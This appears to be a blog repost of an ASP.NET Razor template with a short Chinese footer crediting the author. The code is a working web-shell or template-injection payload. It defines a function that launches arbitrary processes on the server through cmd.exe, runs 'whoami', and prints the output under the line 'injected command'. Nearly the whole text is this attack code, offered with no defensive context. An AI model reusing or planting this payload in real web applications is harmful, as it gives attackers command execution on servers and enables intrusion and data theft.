@using System.CodeDom.Compiler; @using System.Diagnostics; @using System.Reflection; @using System.Web.Compilation; @functions { string ExecuteCommand(string command, string arguments = null) { var output = new System.Text.StringBuilder(); var process = new Process(); var startInfo = new ProcessStartInfo { FileName = command, Arguments = arguments, WorkingDirectory = HttpRuntime.AppDomainAppPath, RedirectStandardOutput = true, RedirectStandardError = true, UseShellExecute = false }; process.StartInfo = startInfo; process.OutputDataReceived += (sender, args) => output.AppendLine(args.Data); process.ErrorDataReceived += (sender, args) => output.AppendLine(args.Data); process.Start(); process.BeginOutputReadLine(); process.BeginErrorReadLine(); process.WaitForExit(); return output.ToString(); } } @{ var cmd = ExecuteCommand("cmd.exe", "/c whoami"); } Output of the injected command (by fuckgov): @cmd
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !